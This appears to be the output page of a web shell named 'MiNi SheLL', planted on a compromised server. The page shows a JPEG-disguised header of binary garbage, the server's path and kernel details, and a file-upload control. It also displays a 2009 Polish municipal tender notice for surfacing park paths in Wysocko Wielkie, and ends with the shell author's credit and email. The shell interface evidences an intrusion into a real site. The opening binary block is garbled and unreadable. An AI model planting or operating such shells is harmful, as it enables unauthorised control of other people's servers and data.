JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090923/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090923/162343-N-2009.html

<p class="kh_header"><b>Ostrów Wielkopolski: Utwardzenie alejek w parku w Wysocku Wielkim, Gmina Ostrów Wielkopolski, woj. wielkopolskie</b><br>
<b>Numer ogłoszenia: 162343 - 2009; data zamieszczenia: 23.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Ostrów Wielkopolski , Aleje Powstańców Wielkopolskich 12, 63-400 Ostrów Wielkopolski, woj. wielkopolskie, tel. 062/7351190.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ostrowwielkopolski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utwardzenie alejek w parku w Wysocku Wielkim, Gmina Ostrów Wielkopolski, woj. wielkopolskie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest utwardzenie alejek w parku w Wysocku Wielkim, Gmina Ostrów Wielkopolski, woj. wielkopolskie.

2.	Przedmiot zamówienia obejmuje:

	Ułożenie nawierzchni:  
- 	nawierzchnia żwirowa, chodnik rozścielony ręcznie - Hanse Grand - 	grubości  5 cm  - 1.390 m2,
- 	nawierzchnia żwirowa, chodnik rozścielony ręcznie - Hanse Grand - 	grubości  6 cm  - 1.390 m2,
- 	sadzenie drzew i krzewów liściastych i iglastych.

3.  Szczegółowy opis przedmiotu zamówienia stanowią załączniki 
załącznik do SIWZ      Szczegółowe Specyfikacje Techniczne wykonania i odbioru robót 
załącznik do SIWZ      Przedmiar robót.

Wymagany okres gwarancji:

- na wykonane roboty ( materiały i robociznę) wynosi 12-miesięcy od dnia odebrania przez Zamawiającego robót budowlanych i podpisania (bez uwag) protokołu końcowego.

- Wykonawca udziela Zamawiającemu gwarancji na piśmie. 

Wymagania odnośnie gwarancji i rękojmi:

- Wykonawca udziela Zamawiającemu gwarancji na piśmie. Gwarancja zawiera w swej treści dwa podstawowe elementy. Pierwszy z nich, obejmuje zapewnienie sprawnego i prawidłowego funkcjonowania przedmiotu zamówienia. Drugi zaś określa warunki odpowiedzialności gwaranta. Stąd też w treści dokumentu gwarancyjnego, winny znaleźć się m.in. okres gwarancji obejmujący pełny zakresu przedmiotu zamówienia, terminy usuwania stwierdzonych wad i usterek, wskazanie świadczeń gwaranta na rzecz Zamawiającego oraz warunki odpowiedzialności gwaranta..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 3.000,00 zł (słownie: trzy tysiące zł 00/100).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału określone w art.22 ust.1 ustawy Pzp. 

1. Spełnienie warunków udziału odnoszących się do posiadania niezbędnej wiedzy 
      i doświadczenia,  dysponowania  osobami zdolnymi do wykonania zamówienia oraz 
      sytuacji finansowej i ekonomicznej zostanie ocenione według poniższych zasad :

1)	 Udokumentowane należyte wykonanie, w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych polegających na budowie, przebudowie nawierzchni dróg (z podaniem ich wartości, dat wykonania oraz odbiorców). 
a)	Dysponowaniem w celu wykonania zamówienia przynajmniej 1 osobą posiadającą uprawnienia do kierowania robotami budowlanymi, kierownik budowy z uprawnieniami budowlanymi specjalności robót budowlanych drogowych.

2)	Zamawiający uzna za spełniony warunek w przypadku wykazania się Wykonawcy realizacją co najmniej dwóch robót budowlanych polegających na wykonaniu nawierzchni drogi z tłucznia kamiennego 
- o wartości co najmniej - 100.000,00 zł każda. 
3)	Ubezpieczenie Wykonawcy od odpowiedzialności cywilnej 
w zakresie prowadzonej działalności.

2. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły 
      spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach 
      (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty.

3.  Zamawiający wezwie w trybie art.26 ust.3 Wykonawców, którzy w określonym terminie 
      nie złożyli oświadczeń i dokumentów potwierdzających spełnianie warunków udziału 
      w postępowaniu lub, którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia 
      w wyznaczonym terminie chyba, że mimo ich uzupełnienia oferta wykonawcy podlega 
      odrzuceniu lub konieczne byłoby unieważnienie postępowania. 

Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej

1.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium 
	Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w § 1ust.1 
	Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. 
1)	pkt.2, 3 i 5 - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
a.	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b.	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, nie orzeczono nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, nie orzeczono 
wobec niego zakazu ubiegania się o zamówienie, 
c.	nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
2)	pkt.4 - składa zaświadczenie właściwego organu sądowego lub administracyjnego 
		kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie 
     określonym w art.24 ust.1 pkt.4 - 8 ustawy.

2.	Dokumenty, o których mowa w ust.1 pkt.1 lit.a i c oraz pkt.2, powinny być wystawione 
      nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków 
      o opuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. 
	Dokument, o którym mowa w ust.1 pkt.1 lit.b, powinien być wystawiony nie wcześniej 
      niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do 
      udziału w postępowaniu o udzielenie zamówienia albo składania ofert.

3. 	Jeżeli w kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub 
      miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust.1, zastępuje się 
  	je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym 
	organem sądowym, administracyjnym albo organem samorządu zawodowego lub 
      gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca 
      ma siedzibę lub miejsce zamieszkania. 
	Przepis ust. 2 stosuje się odpowiednio..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art.22 ust.1 - Wykonawca składa oświadczenia, których wzór stanowi Załącznik Nr 3 do niniejszej SIWZ.

1.	W celu potwierdzenia, że Wykonawca posiada uprawnienia do określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ust.1 ustawy do oferty dołączyć należy:

1)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
2)	Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego, potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
3)	Aktualne zaświadczenie oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

2.	W celu potwierdzenia spełnienia warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania osobami zdolnymi do wykonania zamówienia do oferty dołączyć należy:

1)  wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem 
	wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia 
	działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem
	i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem 
	ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów 
	potwierdzających, że roboty te zostały wykonane należycie - wykonali co najmniej 
	2 roboty budowlane polegające na wykonaniu nawierzchni drogi z tłucznia 	kamiennego - o wartości nie mniejszej niż 100.000,00 zł - każda.
	
Załącznik Nr 4  do niniejszej SIWZ. 

3)	Dokumenty potwierdzające posiadanie uprawnień budowlanych do kierowania  
robotami budowlanymi przez wskazane osoby w zakresie niezbędnym do 
wykonania zamówienia w specjalnościach: 

- kierownik budowy z uprawnieniami budowlanymi - w specjalności robót 
budowlanych drogowych,
- aktualny dokument przynależności do Okręgowej Izby Inżynierów 
Budownictwa /zaświadczenia, wydane przez właściwą izbę samorządu 
zawodowego (Okręgową Izbę Inżynierów Budownictwa), potwierdzające wpis 
danej osoby na listę członków właściwej izby/,
- wykazu osób, którymi dysponuje lub będzie dysponował wykonawca, 
i które będą uczestniczyć w wykonywaniu zamówienia, wraz 
z informacjami na temat ich kwalifikacji zawodowych, doświadczenia 
i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, 
- pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa jak wyżej, wykonawca wskazał osoby, którymi będzie dysponował,

	Załącznik Nr 5  do niniejszej SIWZ, 
w szczególności dotyczy to uprawnień kierownika budowy - w specjalności robót drogowych 
oraz dokumentów potwierdzających przynależność wskazanego kierownika budowy do Polskiej Izby Inżynierów Budownictwa.

3.	W celu potwierdzenia spełnienia warunku znajdowania się Wykonawcy w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia do oferty dołączyć należy:

1)	Polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.  
2)	Przy składaniu ofert przez Wykonawców wspólnie ubiegających się o udzielenie 
zamówienia Wykonawcy mogą złożyć jedną wspólną polisę potwierdzającą, że 
wszyscy Wykonawcy są ubezpieczeni od odpowiedzialności cywilnej w zakresie 
prowadzonej działalności.

4.	Inne wymagane dokumenty:
1)	formularz oferty - Załącznik nr 1;
2)	dowód wniesienia wadium;
3)	dokumenty potwierdzające uprawnienia osób podpisujących ofertę o ile 	uprawnienia te nie wynikają z przepisów prawa lub innych dokumentów 	rejestrowych;
4)	kosztorys ofertowy - Załącznik nr 2;
5)	projekt umowy zaakceptowany przez wykonawcę - Załącznik nr 7;
6)	pisemne zobowiązanie innych podmiotów do udostępnienia osób, które będą 	wykonywać zamówienie w przypadku gdy wykonawca nie dysponuje takimi 	osobami;
7)	pisemne zobowiązanie innych podmiotów do udostępnienia narzędzi i urządzeń  
   niezbędnych do wykonania zamówienia;
8)	oferowane warunki gwarancji - na piśmie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ostrowwielkopolski.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Ostrów Wielkopolski Al. Powstańców Wielkopolskich 12 pokój nr 3..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.10.2009 godzina 08:30, miejsce: Urząd Gminy Ostrów Wielkopolski Al. Powstańców Wielkopolskich 12 pokój 2..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com